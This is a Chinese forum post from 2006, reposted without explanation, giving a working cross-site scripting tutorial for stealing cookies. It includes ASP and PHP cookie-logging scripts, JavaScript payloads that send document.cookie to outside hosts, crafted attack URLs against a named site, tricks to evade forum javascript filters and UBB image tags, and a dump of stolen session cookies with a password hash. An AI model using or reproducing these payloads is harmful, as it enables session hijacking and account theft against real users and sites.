设为首页 |收藏本站 |我的收藏 |我的主页 |好友 |道具 |勋章 |任务
 找回密码

碧海潮声大学生网

碧海潮声大学生网»论坛 碧海潮声-大学生论坛 ≮电脑知识|网络技术≯ 跨站攻击-偷cookies
返回列表 发新帖
查看: 761|回复: 1
打印 上一主题 下一主题

跨站攻击-偷cookies

[复制链接]
跳转到指定楼层
#
发表于 2006-9-11 09:11 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
< %  
msg=Request.ServerVariables("QUERY_STRING")  
testfile=Server.MapPath("cook.txt")  
set fs=server.CreateObject("scripting.filesystemobject")  
set thisfile=fs.OpenTextFile(testfile,8,True,0)  
thisfile.Writeline(""&msg& "")  
thisfile.close  
set fs = nothing  
% >  

  


< script>window.open(’http://www.aapet.com/co.asp?msg=’+document.cookie  


1. 构造一个提交,目标是能够显示用户Cookie信息:  
http://www.5460.net/txl/login/login.pl?username= &passwd=&ok.x=28&ok.y=6  
2. 如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求:  
http://www.5460.net/txl/login/login.pl?username= &passwd=&ok.x=28&ok.y=6  


其中http://www.notfound.org/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信息,内容如下:  
$info = getenv("QUERY_STRING");  
if ($info) {  
$fp = fopen("info.txt","a");  
fwrite($fp,$info."\n");  
fclose($fp);  
}  
header("Location: http://www.5460.net");  
注:"%2B"为"+"的URL编码,并且这里只能用"%2B",因为"+"将被作为空格处理。后面的header语句则纯粹是为了增加隐蔽性。  
3. 如果上面的URL能够正确运行的话,下一步就…………  

涉及到跨站技巧的问题。像大部份论坛,都过滤了javascript这个字符。有个小技巧是可以利用的,可以在论坛发的贴里将javascript写成ascii码。像j可以写成”j”  

再如a可以写成”a”,你可以找一个ascii码表对照修改一下,这样成功率能高一点。还有,你要学会分析一下对方的ubb代码。像动网5.0以下论坛,你在[img]里写入和bbs3000一样的代码就不会成功,因为动网5.0以下,ubb代码http://这个地方当成图片地址了,结你提交的代码被分成了两段javascript:window.open(’和http://www.netsill.net/lcx/info.asp?msg=’+.); ,以至于我们提交的代码丧失了功能。难道就不能攻击了吗?当然不是,我们可以变换种方式提交,在[img]中插入代码如下:  

javascript:window.open(’http://www.netsill.net/lcx/info.asp?msg  

如下图:我偷的cookies:  
msg=ASPSESSIONIDSSDCTDDC=IJNFFJBABCCGKBMFKHOKFJBI;%20ASPSESSIONIDAAQCQBAA=NLJPKNBANJNPDGFPENJFPJHE;%20joekoe%5Fonline=login%5Fid=&login%5Fpassword=&login%5Fusername=&guest%5Fname=%D3%CE%BF%CD38869331&cookies%5Ftrue=yes&vc%5Fup%5Fnews=jk8822;%20ASPSESSIONIDCCRDQBAB=NGGFCCCAEAECNNPOKHFOCJNK;%20ASPSESSIONIDQQBDSDDC=PEJBBFCAPKOKKLHBIMFEBPHA  
msg=ASPSESSIONIDSSDCTDDC=IJNFFJBABCCGKBMFKHOKFJBI;%20ASPSESSIONIDAAQCQBAA=NLJPKNBANJNPDGFPENJFPJHE;%20joekoe%5Fonline=login%5Fpassword=b7f688e82b6451c2&login%5Fid=4&login%5Fusername=xgb&time%5Fload=2005%2D8%2D15+16%3A04%3A49&guest%5Fname=%D3%CE%BF%CD38869331&cookies%5Ftrue=yes&vc%5Fup%5Fnews=jk8822;%20ASPSESSIONIDCCRDQBAB=NGGFCCCAEAECNNPOKHFOCJNK;%20ASPSESSIONIDQQBDSDDC=PEJBBFCAPKOKKLHBIMFEBPHA  [s:69]

转的  看不明白```
cookies, 攻击
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩

相关帖子
回复

使用道具 举报

1#
发表于 2006-9-11 23:24 | 只看该作者
哪里转的啊?
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|小黑屋| 碧海潮声大学生网  

Copyright © 2001-2013 Comsenz Inc.   All Rights Reserved.

Powered by Discuz! X3.2( 浙ICP备11026473号 )

快速回复 返回顶部 返回列表